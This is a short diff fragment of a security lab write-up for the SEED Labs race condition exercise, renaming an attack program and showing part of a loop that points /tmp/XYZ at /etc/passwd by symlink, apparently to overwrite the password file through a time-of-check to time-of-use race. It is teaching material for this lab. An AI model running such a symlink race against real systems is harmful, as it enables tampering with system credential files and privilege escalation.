he15enbug/security-labs/SEED-Lab/Software/Race_Condition/Race_Condition.md

     done
     echo "STOP...
 The passwd file has been changed"
     ```
-- the core code of our target program `auto_atk.c`
+- the core code of our target program `atk.c`
     ```
     while(1) {
         symlink("/etc/passwd", "/tmp/XYZ");